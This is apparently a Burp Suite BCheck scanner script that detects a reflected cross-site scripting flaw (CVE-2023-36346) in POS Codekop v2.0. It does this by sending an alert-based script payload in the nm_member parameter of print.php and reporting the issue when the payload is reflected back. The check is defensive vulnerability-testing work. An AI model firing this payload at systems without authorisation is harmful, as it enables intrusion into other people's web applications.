vulnerabilities-CVEd/CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck

metadata:
	language: v1-beta
	name: "CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting"
	author: "Parimal Shaw"
	description: "Checks for CVE-2023-36346"
	tags: "CVE-2023-36346"

define:
    potential_path = "/print.php?nm_member=<script>alert(document.location)</script>"

given host then
    send request called check:
	method: "GET"
	path: {potential_path}


		if {check.response.status_code} is "200" and "<script>alert(document.location)</script>" in {check.response.body} and "<title>print</title>" in {check.response.body} and "text/html" in {check.response.headers} then
		report issue:
            severity: medium
            confidence: certain
            detail: "POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php."
			remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user."
		end if	